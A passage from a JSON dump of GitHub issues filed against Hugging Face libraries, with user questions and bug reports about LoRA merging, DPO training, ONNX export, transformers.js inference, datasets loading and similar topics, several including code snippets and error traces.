"https://github.com/huggingface/candle/issues/1552", "state": "closed", "labels": [], "created_at": "2024-01-10T11:57:55Z", "updated_at": "2024-01-10T12:38:54Z", "user": "lz1998" }, { "repo": "huggingface/sentence-transformers", "number": 2400, "title": "New release of library?", "body": "I was wondering when you will be releasing a new version of the library that includes the latest changes in the main branch? We are eagerly awaiting one inorder to consume the fix for this issue https://github.com/UKPLab/sentence-transformers/issues/1800", "url": "https://github.com/huggingface/sentence-transformers/issues/2400", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-09T20:42:53Z", "updated_at": "2024-01-29T10:00:33Z", "user": "vineetsajuTR" }, { "repo": "huggingface/peft", "number": 1334, "title": "when we use inject_adapter_in_model method to inject the adapters directly into a PyTorch model, how to merge the Lora weight with the base model in the inference stage?", "body": "", "url": "https://github.com/huggingface/peft/issues/1334", "state": "closed", "labels": [], "created_at": "2024-01-09T12:30:52Z", "updated_at": "2024-02-17T15:03:59Z", "user": "mikiyukio" }, { "repo": "huggingface/datasets", "number": 6570, "title": "No online docs for 2.16 release", "body": "We do not have the online docs for the latest minor release 2.16 (2.16.0 nor 2.16.1).\r\n\r\nIn the online docs, the latest version appearing is 2.15.0: https://huggingface.co/docs/datasets/index\r\n\r\n![Screenshot from 2024-01-09 08-43-08](https://github.com/huggingface/datasets/assets/8515462/83613222-867f-41f4-8833-7a4a76582f44)\r\n", "url": "https://github.com/huggingface/datasets/issues/6570", "state": "closed", "labels": [ "bug", "documentation" ], "created_at": "2024-01-09T07:43:30Z", "updated_at": "2024-01-09T16:45:50Z", "comments": 7, "user": "albertvillanova" }, { "repo": "huggingface/text-generation-inference", "number": 1415, "title": "How to use local Medusa head?", "body": "It is said that Medusa can significantly accelerate inference speed. During my attempts to utilize it, I have observed that it does not support the use of local Medusa config and head. The code fragment I discovered that pertains to this functionality is as follows, which I have modified. However, I do not comprehend the meaning of 'medusa_sf'. The training process of Medusa does not generate new safetensors. What is this? \r\n```python\r\nmedusa_config = f\"{model_id}/config_medusa.json\"\r\n# medusa_config = hf_hub_download(\r\n# use_medusa, revision=revision, filename=\"config.json\"\r\n# )\r\nwith open(medusa_config, \"r\") as f:\r\n config = json.load(f)\r\nmedusa_head = f\"{model_id}/medusa_lm_head.pt\"\r\n# medusa_head = hf_hub_download(\r\n# use_medusa, revision=revision, filename=\"medusa_lm_head.pt\"\r\n# )\r\nmedusa_sf = medusa_head[: -len(\".pt\")] + \".safetensors\"\r\nweights = Weights(\r\n [medusa_sf], device, dtype, process_group=self.process_group\r\n)\r\nlm_head = model.lm_head\r\nmodel.lm_head = MedusaModel(config, weights, lm_head)\r\n```\r\n\r\nHow should I employ TGI to access the local Medusa? A huge thank for your work!", "url": "https://github.com/huggingface/text-generation-inference/issues/1415", "state": "closed", "labels": [], "created_at": "2024-01-09T03:22:47Z", "updated_at": "2024-01-10T17:36:23Z", "user": "eurus-ch" }, { "repo": "huggingface/transformers", "number": 28388, "title": "How to use an efficient encoder as shared EncoderDecoderModel?", "body": "### Feature request\n\nEfficient encoder like destilBERT, ALBERT or ELECTRA aren't supported as decoder of the EncoderDecoderModel and so they can't be shared as encoder and decoder.\n\n### Motivation\n\nWarm-starting shared models is a powerful way to build transformer models. Yet the efficient models can't be used.\n\n### Your contribution\n\nWe could implement the support for destilBERT, ALBERT or ELECTRA. They shouldn't be that different from other encoders.", "url": "https://github.com/huggingface/transformers/issues/28388", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-01-08T11:43:05Z", "updated_at": "2024-01-08T12:35:24Z", "user": "Bachstelze" }, { "repo": "huggingface/alignment-handbook", "number": 92, "title": "Is there anyway that I can use learning rate warm-up during the training ? ", "body": "I am using this repo to:\r\n1. Continual Pre-training \r\n2. SFT\r\n3. DPR\r\n\r\nFor stage 1, I want to use a learning rate warm-up. ", "url": "https://github.com/huggingface/alignment-handbook/issues/92", "state": "closed", "labels": [], "created_at": "2024-01-07T21:07:25Z", "updated_at": "2024-01-10T06:48:52Z", "comments": 1, "user": "shamanez" }, { "repo": "huggingface/alignment-handbook", "number": 91, "title": "how to use dpo without flash-attention", "body": "Is there any flash-attention free version?", "url": "https://github.com/huggingface/alignment-handbook/issues/91", "state": "open", "labels": [], "created_at": "2024-01-07T16:27:08Z", "updated_at": "2024-02-06T19:51:38Z", "user": "Fu-Dayuan" }, { "repo": "huggingface/accelerate", "number": 2312, "title": "Seeking for Help: how to work deepspeed zero stage 3 with quantized model? ", "body": "Hi, I would like to conduct dpo training on my 2 a6000 (48GB) gpus based on this project (https://github.com/allenai/open-instruct). Specifically, the model was based on qlora and reference model was based on quantized one. I would like to utilize the deepspeed zero stage 3 to accelerate training time. \r\n\r\nDuring the training process, I encountered errors related to the model and reference model integration with Deepspeed. Below is the relevant code snippet and the encountered error:\r\n\r\n\r\nThe model and reference model both were loaded with \r\n\r\n```python\r\nbnb_config = BitsAndBytesConfig(\r\n load_in_8bit=True,\r\n )\r\ndevice_index = accelerator.local_process_index\r\ndevice_map = {\"\": device_index} # force data-parallel training.\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_name_or_path,\r\n from_tf=bool(\".ckpt\" in model_name_or_path),\r\n config=config,\r\n load_in_8bit=True,\r\n quantization_config=bnb_config,\r\n torch_dtype=torch.bfloat16,\r\n use_flash_attention_2=True if args.use_flash_attn else False,\r\n)\r\nreference_model = model\r\n\r\n# some codes about coverting model to lora model...\r\n\r\ndef prepare_deepspeed(accelerator, model):\r\n deepspeed_plugin = accelerator.state.deepspeed_plugin\r\n config_kwargs = deepcopy(deepspeed_plugin.deepspeed_config)\r\n\r\n if model is not None:\r\n if hasattr(model, \"config\"):\r\n hidden_size = (\r\n max(model.config.hidden_sizes)\r\n if getattr(model.config, \"hidden_sizes\", None)\r\n else getattr(model.config, \"hidden_size\", None)\r\n )\r\n if hidden_size is not None and config_kwargs[\"zero_optimization\"][\"stage\"] == 3:\r\n # Note that `stage3_prefetch_bucket_size` can produce DeepSpeed messages like: `Invalidate trace cache @ step 0: expected module 1, but got module 0`\r\n # This is expected and is not an error, see: https://github.com/microsoft/DeepSpeed/discussions/4081\r\n config_kwargs.update(\r\n {\r\n \"zero_optimization.reduce_bucket_size\": hidden_size * hidden_size,\r\n \"zero_optimization.stage3_param_persistence_threshold\": 10 * hidden_size,\r\n \"zero_optimization.stage3_prefetch_bucket_size\": 0.9 * hidden_size * hidden_size,\r\n }\r\n )\r\n\r\n # If ZeRO-3 is used, we shard both the active and reference model.\r\n # Otherwise, we assume the reference model fits in memory and is initialized on each device with ZeRO disabled (stage 0)\r\n if config_kwargs[\"zero_optimization\"][\"stage\"] != 3:\r\n config_kwargs[\"zero_optimization\"][\"stage\"] = 0\r\n model, *_ = deepspeed.initialize(model=model, config=config_kwargs)\r\n model.eval()\r\n return model\r\n\r\nreference_model = prepare_deepspeed(accelerator, reference_model)\r\n```\r\n\r\n\r\n\r\n```\r\nFile \"/root/data1/tulu2/open-instruct/open-instruct-main/open_instruct/dpo_tune.py\", line 692, in main \r\n reference_model = prepare_deepspeed(accelerator, reference_model) \r\n File \"/root/data1/tulu2/open-instruct/open-instruct-main/open_instruct/dpo_tune.py\", line 396, in prepare_deepspeed \r\n model, *_ = deepspeed.initialize(model=model, config=config_kwargs) \r\n File \"/conda/envs/tulu_dpo_env/lib/python3.10/site-packages/deepspeed/__init__.py\", line 171, in initialize \r\n engine = DeepSpeedEngine(args=args, \r\n File \"/conda/envs/tulu_dpo_env/lib/python3.10/site-packages/deepspeed/runtime/engine.py\", line 259, in __init__ \r\n self._configure_distributed_model(model) \r\n File \"/conda/envs/tulu_dpo_env/lib/python3.10/site-", "url": "https://github.com/huggingface/accelerate/issues/2312", "state": "closed", "labels": [], "created_at": "2024-01-07T09:44:28Z", "updated_at": "2024-01-11T11:01:31Z", "user": "grayground" }, { "repo": "huggingface/datasets", "number": 6565, "title": " `drop_last_batch=True` for IterableDataset map function is ignored with multiprocessing DataLoader ", "body": "### Describe the bug\r\n\r\nScenario:\r\n- Interleaving two iterable datasets of unequal lengths (`all_exhausted`), followed by a batch mapping with batch size 2 to effectively merge the two datasets and get a sample from each dataset in a single batch, with `drop_last_batch=True` to skip the last batch in case it doesn't have two samples.\r\n\r\nWhat works:\r\n- Using DataLoader with `num_workers=0`\r\n\r\nWhat does not work:\r\n- Using DataLoader with `num_workers=1`, errors in the last batch.\r\n\r\nBasically, `drop_last_batch=True` is ignored when using multiple dataloading workers.\r\n\r\nPlease take a look at the minimal repro script below.\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nfrom datasets import Dataset, interleave_datasets\r\nfrom torch.utils.data import DataLoader\r\n\r\n\r\ndef merge_samples(batch):\r\n assert len(batch['a']) == 2, \"Batch size must be 2\"\r\n batch['c'] = [batch['a'][0]]\r\n batch['d'] = [batch['a'][1]]\r\n return batch\r\n\r\n\r\ndef gen1():\r\n for ii in range(1, 8385):\r\n yield {\"a\": ii}\r\n\r\n\r\ndef gen2():\r\n for ii in range(1, 5302):\r\n yield {\"a\": ii}\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n dataset1 = Dataset.from_generator(gen1).to_iterable_dataset(num_shards=1024)\r\n dataset2 = Dataset.from_generator(gen2).to_iterable_dataset(num_shards=1024)\r\n\r\n interleaved = interleave_datasets([dataset1, dataset2], stopping_strategy=\"all_exhausted\")\r\n mapped = interleaved.map(merge_samples, batched=True, batch_size=2, remove_columns=interleaved.column_names,\r\n drop_last_batch=True)\r\n\r\n # Works\r\n loader = DataLoader(mapped, batch_size=32, num_workers=0)\r\n i = 0\r\n for b in loader:\r\n print(i, b['c'].shape, b['d'].shape)\r\n i += 1\r\n\r\n print(\"DataLoader with num_workers=0 works\")\r\n\r\n # Doesn't work\r\n loader = DataLoader(mapped, batch_size=32, num_workers=1)\r\n i = 0\r\n for b in loader:\r\n print(i, b['c'].shape, b['d'].shape)\r\n i += 1\r\n\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\n `drop_last_batch=True` should have same behaviour for `num_workers=0` and `num_workers>=1`\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.16.1\r\n- Platform: macOS-10.16-x86_64-i386-64bit\r\n- Python version: 3.10.12\r\n- `huggingface_hub` version: 0.20.2\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3\r\n- `fsspec` version: 2023.6.0\r\n\r\nI have also tested on Linux and got the same behavior.", "url": "https://github.com/huggingface/datasets/issues/6565", "state": "closed", "labels": [], "created_at": "2024-01-07T02:46:50Z", "updated_at": "2025-03-08T09:46:05Z", "comments": 2, "user": "naba89" }, { "repo": "huggingface/transformers.js", "number": 505, "title": "How do I use WebGL as executionProvider?", "body": "### Question\n\n```js\r\nexport const executionProviders = [\r\n // 'webgpu',\r\n 'wasm'\r\n];\r\n```\r\nI looked at src/backends/onnx.js and noticed that there was no webgl in the executionProviders.\r\nIs there a way to use WebGL as executionProvider?", "url": "https://github.com/huggingface/transformers.js/issues/505", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-06T19:16:36Z", "updated_at": "2024-10-18T13:30:09Z", "user": "kwaroran" }, { "repo": "huggingface/diffusers", "number": 6474, "title": "how to use xformers", "body": "Maybe this is a relatively low-level question, but what always bothers me is how does Xformer run when running SD? Or can it be accelerated by default after installing this library? Thank you all for answering your questions", "url": "https://github.com/huggingface/diffusers/issues/6474", "state": "closed", "labels": [], "created_at": "2024-01-06T03:34:16Z", "updated_at": "2024-01-11T03:38:19Z", "user": "babyta" }, { "repo": "huggingface/datasets", "number": 6561, "title": "Document YAML configuration with \"data_dir\"", "body": "See https://huggingface.co/datasets/uonlp/CulturaX/discussions/15#6597e83f185db94370d6bf50 for reference", "url": "https://github.com/huggingface/datasets/issues/6561", "state": "open", "labels": [ "documentation" ], "created_at": "2024-01-05T14:03:33Z", "updated_at": "2025-08-07T14:57:58Z", "comments": 6, "user": "severo" }, { "repo": "huggingface/sentence-transformers", "number": 2397, "title": "Does finetuning a cross-encoder yield prediction labels and not similarity scores?", "body": "Hi, \r\nThis is less of a coding issue and more of a conceptual question. I have binary labels for similarity and dissimilarity while training a cross-encoder; so its a binary classification task. The pretrained cross-encoder has a float score, most of the time around .5. After finetuning, the models only predict a decimal really close 0 or 1, which makes sense since the model is being trained for a binary classification task. But is is supposed to be a label prediction or a similarity score? Or is it limited to the type of data you have for training? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2397", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-04T21:01:44Z", "updated_at": "2024-01-09T17:53:17Z", "user": "FDSRashid" }, { "repo": "huggingface/text-generation-inference", "number": 1403, "title": "How to load llama-2 thru Client", "body": "### System Info\n\nHi there, text_generation.__version__ = 0.6.0\r\n\r\n\n\n### Information\n\n- [ ] Docker\n- [X] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nI am trying to load llama-2 model thru Client\r\n\r\n```\r\nfrom text_generation import Client\r\nmodel_endpoint = \"https://api-inference.huggingface.co/models/meta-llama/Llama-2-7b-hf\"\r\n# model_endpoint = \"https://api-inference.huggingface.co/models/tiiuae/falcon-7b-instruct\"\r\n# model_endpoint = \"https://api-inference.huggingface.co/models/lmsys/vicuna-7b-v1.5\"\r\n\r\nclient = Client(model_endpoint, timeout=60, headers={\"Authorization\": f\"Bearer {token_auth}\"})\r\ngeneration: str = client.generate(\r\n prompt=\"What is the capital city of British Columbia, Canada\",\r\n temperature=1,\r\n top_p=0.9,\r\n max_new_tokens=384,\r\n stop_sequences=None,\r\n ).generated_text\r\n```\r\n\n\n### Expected behavior\n\nHowever, this is an error:\r\n\r\n> BadRequestError: Model requires a Pro subscription; check out hf.co/pricing to learn more. Make sure to include your HF token in your query.\r\n\r\nKindly ask any solutions ?\r\nthanks.", "url": "https://github.com/huggingface/text-generation-inference/issues/1403", "state": "closed", "labels": [], "created_at": "2024-01-04T17:25:59Z", "updated_at": "2024-01-05T16:01:56Z", "user": "yanan1116" }, { "repo": "huggingface/transformers", "number": 28343, "title": "How to log custom value?", "body": "I want to log some info to `{'loss': 2.5234, 'learning_rate': 1.0344827586206896e-06, 'epoch': 0.0}`\r\nhow can i do that?\r\nlike: {'loss': 2.5234, 'learning_rate': 1.0344827586206896e-06, 'epoch': 0.0, 'version': 'v1'} ", "url": "https://github.com/huggingface/transformers/issues/28343", "state": "closed", "labels": [], "created_at": "2024-01-04T12:28:43Z", "updated_at": "2024-01-07T13:07:22Z", "user": "xmy0916" }, { "repo": "huggingface/transformers.js", "number": 499, "title": "An error occurred during model execution: \"RangeError: offset is out of bounds\".", "body": "### Question\n\nHello - having an issue getting this code to run in the browser. Using `Xenova/TinyLlama-1.1B-Chat-v1.0` on `\"@xenova/transformers\": \"^2.13.2\"` \r\n\r\nIt runs perfectly in node.\r\n\r\n```ts\r\nimport { pipeline } from '@xenova/transformers';\r\n\r\nconsole.log('Loading model...');\r\nconst generator = await pipeline('text-generation', 'Xenova/TinyLlama-1.1B-Chat-v1.0');\r\nconsole.log('Model loaded!');\r\nconst messages = [\r\n { role: 'system', content: 'You are a friendly Assistant' },\r\n { role: 'user', content: 'Explain JavaScript Scopes in simple terms' },\r\n];\r\n\r\nconst prompt = generator.tokenizer.apply_chat_template(messages, {\r\n tokenize: false,\r\n add_generation_prompt: true,\r\n});\r\n\r\nconsole.log('Generating...');\r\nconst result = await generator(prompt, {\r\n max_new_tokens: 256,\r\n temperature: 0.5,\r\n do_sample: true,\r\n top_k: 50,\r\n});\r\n\r\nconsole.dir(result);\r\n```\r\n\r\nIn Node it runs: \r\n\r\n\"Screenshot \r\n\r\nBut in the browser I see this:\r\n\r\n\"Screenshot\r\n\r\nSame issue in Firefox.\r\n\r\nThis issue seems to say it's memory: https://github.com/xenova/transformers.js/issues/8\r\n\r\nIs this one too large to run in the browser?", "url": "https://github.com/huggingface/transformers.js/issues/499", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-03T19:55:45Z", "updated_at": "2024-10-18T13:30:09Z", "user": "wesbos" }, { "repo": "huggingface/transformers.js", "number": 497, "title": "Cross Encoder", "body": "### Question\n\nI'm trying to run this pre-trained Cross Encoder model ([MS Marco TinyBERT](https://huggingface.co/cross-encoder/ms-marco-TinyBERT-L-2-v2)) not available in Transformers.js.\r\n\r\nI've managed to convert it using the handy script, and I'm successfully running it with the \"feature-extraction\" task:\r\n```js\r\nconst pairs = [\r\n[\"How many people live in Berlin?\", \"Berlin had a population of 3,520,031 registered inhabitants in an area of 891.82 square kilometers.\"],\r\n[ \"How many people live in Berlin?\", \"Berlin is well known for its museums.\"]\r\n];\r\n\r\nconst model = await pipeline(\"feature-extraction\", modelName);\r\nconst out = await model(pairs[0]);\r\n\r\nconsole.log(Array.from(out.data)) // [-8.387903213500977, -9.811422348022461]\r\n```\r\n\r\nBut I'm trying to run it as a Cross Encoder model as it's intended to, like the Python [example code](https://www.sbert.net/docs/pretrained-models/ce-msmarco.html?highlight=cross%20encoder):\r\n```python\r\nfrom sentence_transformers import CrossEncoder\r\n\r\nmodel_name = 'cross-encoder/ms-marco-TinyBERT-L-2-v2'\r\nmodel = CrossEncoder(model_name, max_length=512)\r\n\r\nscores = model.predict([\r\n('How many people live in Berlin?', 'Berlin had a population of 3,520,031 registered inhabitants in an area of 891.82 square kilometers.'), \r\n('How many people live in Berlin?', 'Berlin is well known for its museums.')\r\n])\r\n\r\nprint(scores) // [ 7.1523685 -6.2870455]\r\n```\r\n\r\nHow can I infer a similarity score from two sentences?\r\n\r\nPS: if there are existing models/techniques for sentence similarity I'll take it!", "url": "https://github.com/huggingface/transformers.js/issues/497", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-03T16:24:37Z", "updated_at": "2024-03-01T00:11:31Z", "user": "achrafash" }, { "repo": "huggingface/autotrain-advanced", "number": 448, "title": "What is the difference between autotrain and kohya_ss?", "body": "What is the difference between autotrain and kohya_ss?\r\n\r\n ", "url": "https://github.com/huggingface/autotrain-advanced/issues/448", "state": "closed", "labels": [ "stale" ], "created_at": "2024-01-03T16:18:58Z", "updated_at": "2024-01-22T15:01:45Z", "user": "loboere" }, { "repo": "huggingface/optimum", "number": 1622, "title": "device set bug", "body": "### System Info\n\n```shell\noptimum 1.16.1\n```\n\n\n### Who can help?\n\n@philschmid\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, GPTQConfig\r\n\r\nmodel_id = \"facebook/opt-125m\"\r\ntokenizer = AutoTokenizer.from_pretrained(model_id)\r\nquantization_config = GPTQConfig(bits=4, dataset=[\"c4\", \"c4\", \"c4\"], tokenizer=tokenizer)\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(model_id, device_map=\"cuda:5\", quantization_config=quantization_config)\r\n\r\nprint()\n\n### Expected behavior\n\noptimum/gptq/quantizer.py line 429\r\ndata[k] = v.to(0)\r\n\r\nWhy is it fixed at 0? When setting device_map for the model, an error occurs that the input and model are not on the same device.\r\nIs this a bug?", "url": "https://github.com/huggingface/optimum/issues/1622", "state": "open", "labels": [ "bug" ], "created_at": "2024-01-03T09:01:16Z", "updated_at": "2024-01-09T10:17:45Z", "comments": 1, "user": "Yuang-Deng" }, { "repo": "huggingface/transformers.js", "number": 494, "title": "in-browser inference slower than node inference to be expected?", "body": "### Question\n\ni noticed that i get much higher performance when i run inference in node vs in the browser (latest chrome, m2 mac, ). is that generally to be expected? for context - i'm creating embeddings for chunks of text using the gte-small model. \r\nthank you!", "url": "https://github.com/huggingface/transformers.js/issues/494", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-03T04:26:47Z", "updated_at": "2024-08-27T23:53:36Z", "user": "carlojoerges" }, { "repo": "huggingface/optimum", "number": 1621, "title": "Cannot convert sentence transformer model properly", "body": "### System Info\r\n\r\n```shell\r\nOptimum Version = 1.16.1\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@michaelbenayoun \r\n@fxmarty\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [x] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [x] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nWhen running:\r\n`optimum-cli export onnx -m sentence-transformers/distiluse-base-multilingual-cased-v2 --task feature-extraction ./models/distiluse-base-multilingual-cased-v2`\r\n\r\nI get:\r\n```\r\n...\r\nThe ONNX export succeeded with the warning: The exported ONNX model does not have the exact same outputs as what is provided in SentenceTransformersTransformerOnnxConfig. Difference: onnx::Shape_530, onnx::Shape_233, onnx::Shape_332, onnx::Shape_431, onnx::Shape_629, 764.\r\n...\r\n```\r\n\r\nAnd afterwards when i try running the inference session with the generated .onnx model i get:\r\n```\r\nonnxruntime.capi.onnxruntime_pybind11_state.InvalidArgument: [ONNXRuntimeError] : 2 : INVALID_ARGUMENT : Non-zero status code returned while running Expand node. Name:'/1/Expand' Status Message: invalid expand shape\r\n```\r\n\r\nIt seems like the model is not being properly converted. I'm currently trying to figure out why exactly.\r\n\r\n### Extra context:\r\n- This pr seems to have added support to sentence-transformers models, maybe something is missing: https://github.com/huggingface/optimum/pull/1589\r\n- To generate the runtime session error I used this script and changed the model names and exported model path: https://github.com/huggingface/optimum/issues/1519#issuecomment-1854780869\r\n- The same error occurs using node.js onnx runtime, so I assume the model is not exported properly.\r\n\r\n\r\n### Expected behavior\r\n\r\nThe model is exported properly and generates the same results as using Sentence transformers directly.", "url": "https://github.com/huggingface/optimum/issues/1621", "state": "closed", "labels": [ "bug" ], "created_at": "2024-01-02T12:08:07Z", "updated_at": "2024-01-12T15:26:21Z", "comments": 4, "user": "leodalcin" }, { "repo": "huggingface/alignment-handbook", "number": 87, "title": "How can I config `loss_type`?", "body": "I want to change the **loss_type** into KTO or something else to test but I can't. Please show me the way. Thank you.", "url": "https://github.com/huggingface/alignment-handbook/issues/87", "state": "closed", "labels": [], "created_at": "2024-01-02T11:54:34Z", "updated_at": "2024-01-10T13:41:19Z", "comments": 2, "user": "hahuyhoang411" }, { "repo": "huggingface/datasets", "number": 6548, "title": "Skip if a dataset has issues", "body": "### Describe the bug\n\nHello everyone,\r\nI'm using **load_datasets** from **huggingface** to download the datasets and I'm facing an issue, the download starts but it reaches some state and then fails with the following error:\r\nCouldn't reach https://huggingface.co/datasets/wikimedia/wikipedia/resolve/4cb9b0d719291f1a10f96f67d609c5d442980dc9/20231101.ext/train-00000-of-00001.parquet\r\n\r\nFailed to resolve \\'huggingface.co\\' ([Errno -3] Temporary failure in name resolution)\"))')))\r\n\r\n\r\n![image](https://github.com/huggingface/datasets/assets/143214684/8847d9cb-529e-4eda-9c76-282713dfa3af)\r\n\r\nso I was wondering is there a parameter to be passed to load_dataset() to skip files that can't be downloaded??\n\n### Steps to reproduce the bug\n\nParameter to be passed to load_dataset() of huggingface to skip files that can't be downloaded??\n\n### Expected behavior\n\nload_dataset() finishes without error\n\n### Environment info\n\nNone", "url": "https://github.com/huggingface/datasets/issues/6548", "state": "open", "labels": [], "created_at": "2023-12-31T12:41:26Z", "updated_at": "2024-01-02T10:33:17Z", "comments": 1, "user": "hadianasliwa" }, { "repo": "huggingface/transformers.js", "number": 491, "title": "Running tests locally fail", "body": "### Question\n\nWhen I git clone to my Mac, and run tests, I get a lot of errors:\r\n\r\n```\r\n \u25cf Models \u203a Loading different architecture types \u203a gpt2 (GPT2Model)\r\n\r\n Could not locate file: \"https://huggingface.co/gpt2/resolve/main/tokenizer_config.json\".\r\n\r\n 239 |\r\n 240 | const message = ERROR_MAPPING[status] ?? `Error (${status}) occurred while trying to load file`;\r\n > 241 | throw Error(`${message}: \"${remoteURL}\".`);\r\n | ^\r\n 242 | }\r\n 243 |\r\n 244 | class FileCache {\r\n\r\n at handleError (src/utils/hub.js:241:11)\r\n at getModelFile (src/utils/hub.js:474:24)\r\n at getModelJSON (src/utils/hub.js:575:18)\r\n at async Promise.all (index 1)\r\n at loadTokenizer (src/tokenizers.js:61:16)\r\n at Function.from_pretrained (src/tokenizers.js:2465:20)\r\n at Object. (tests/models.test.js:61:37)\r\n```\r\n\r\nAnd indeed, a lot of files don't actually exist, like in this case:\r\n\r\nhttps://huggingface.co/gpt2/resolve/main/tokenizer_config.json\r\n\r\nBut I don't see this in the logs for your github actions, so i am confused.", "url": "https://github.com/huggingface/transformers.js/issues/491", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-30T02:12:35Z", "updated_at": "2024-10-18T13:30:11Z", "user": "sroussey" }, { "repo": "huggingface/transformers.js", "number": 490, "title": "Is it possible to implement sentence splitting?", "body": "### Question\n\nCan this library be used to implement sentence splitting, possibly with tokenizers?", "url": "https://github.com/huggingface/transformers.js/issues/490", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-30T01:17:55Z", "updated_at": "2024-02-01T01:51:52Z", "user": "devfacet" }, { "repo": "huggingface/transformers.js", "number": 486, "title": "Output different from sentence transformers", "body": "### Question\n\nHello, i'm not sure if i'm doing something wrong, but the pooled outputs from sentence transformers and this library seem to be different.\r\nThe results are the same if I use `pooling: 'none'` in js and `output_value='token_embedding` in python.\r\nI've seen some other similar issues, but this seems to be a different problem.\r\n\r\n```js\r\nconst fs = require('fs');\r\nclass MyClassificationPipeline {\r\n static task = 'feature-extraction';\r\n static model = 'Xenova/distiluse-base-multilingual-cased-v2';\r\n static instance = null;\r\n\r\n static async getInstance(progress_callback = null) {\r\n if (this.instance === null) {\r\n // Dynamically import the Transformers.js library\r\n let { pipeline, env } = await import('@xenova/transformers');\r\n\r\n // NOTE: Uncomment this to change the cache directory\r\n // env.cacheDir = './.cache';\r\n\r\n this.instance = pipeline(this.task, this.model, { progress_callback, quantized: false });\r\n }\r\n\r\n return this.instance;\r\n }\r\n}\r\n\r\n// Comment out this line if you don't want to start loading the model as soon as the server starts.\r\n// If commented out, the model will be loaded when the first request is received (i.e,. lazily).\r\nMyClassificationPipeline.getInstance();\r\n\r\nasync function main() {\r\n const classifier = await MyClassificationPipeline.getInstance();\r\n const res = await classifier('This is an example sentence', { pooling: 'mean', normalize:false });\r\n fs.writeFileSync('./xenova-embedding.json', JSON.stringify(res.data, null, 2), 'utf-8');\r\n}\r\n\r\nmain();\r\n```\r\n\r\n```python\r\nimport json\r\nfrom sentence_transformers import SentenceTransformer\r\nmodel = SentenceTransformer('sentence-transformers/distiluse-base-multilingual-cased-v2')\r\nembedding = model.encode(\"This is an example sentence\")\r\n\r\nwith open('embeddings.json', 'w') as f:\r\n json.dump(embedding.tolist(), f)\r\n```\r\n\r\nAm i missing something?", "url": "https://github.com/huggingface/transformers.js/issues/486", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-29T10:15:07Z", "updated_at": "2024-01-02T12:20:17Z", "user": "leodalcin" }, { "repo": "huggingface/trl", "number": 1155, "title": "What is the best way for the inference process in LORA in PEFT approach", "body": "Here is the SFTtrainer method i used for finetuning mistral\r\n```\r\ntrainer = SFTTrainer(\r\n model=peft_model,\r\n train_dataset=data,\r\n peft_config=peft_config,\r\n dataset_text_field=\" column name\",\r\n max_seq_length=3000,\r\n tokenizer=tokenizer,\r\n args=training_arguments,\r\n packing=packing,\r\n)\r\ntrainer.train()\r\n```\r\nI found different mechanisms for the finetuned model inference after PEFT based LORA finetuning\r\n\r\nMethod - 1\r\n\r\nsave adapter after completing training and then merge with base model then use for inference\r\n```\r\ntrainer.model.save_pretrained(\"new_adapter_path\")\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n new_adapter_path,\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\n\r\nMethod - 2\r\n\r\nsave checkpoints during training and then use the checkpoint with the least loss\r\n```\r\nfrom peft import PeftModel\r\nfinetuned_model = PeftModel.from_pretrained(base_model,\r\n \"least loss checkpoint path\",\r\n torch_dtype=torch.float16,\r\n is_trainable=False,\r\n device_map=\"auto\"\r\n )\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n``` \r\nMethod - 3\r\n\r\nsame method with AutoPeftModelForCausalLM class \r\n```\r\nmodel = AutoPeftModelForCausalLM.from_pretrained(\r\n \"output directory checkpoint path\",\r\n low_cpu_mem_usage=True,\r\n return_dict=True,\r\n torch_dtype=torch.float16,\r\n device_map=\"cuda\")\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-4\r\n\r\nAutoPeftModelForCausalLM class specifies the output folder without specifying a specific checkpoint\r\n```\r\ninstruction_tuned_model = AutoPeftModelForCausalLM.from_pretrained(\r\n training_args.output_dir,\r\n torch_dtype=torch.bfloat16,\r\n device_map = 'auto',\r\n trust_remote_code=True,\r\n)\r\nfinetuned_model = finetuned_model.merge_and_unload()\r\n```\r\nMethod-5\r\nAll the above methods without merging\r\n```\r\n#finetuned_model = finetuned_model.merge_and_unload()\r\n```\r\n\r\nWhich is the actual method I should follow for inference?\r\nand when to use which method over another?", "url": "https://github.com/huggingface/trl/issues/1155", "state": "closed", "labels": [], "created_at": "2023-12-29T09:51:23Z", "updated_at": "2024-02-10T15:05:12Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/peft", "number": 1310, "title": "What is the best way for the inference process in LORA in PEFT approach", "body": "### Feature request\r\n\r\nWhat is the best way for the inference process in LORA in PEFT approach\r\n### Motivation\r\n\r\nWhat is the best way for the inference process in LORA in PEFT approach\r\n### Your 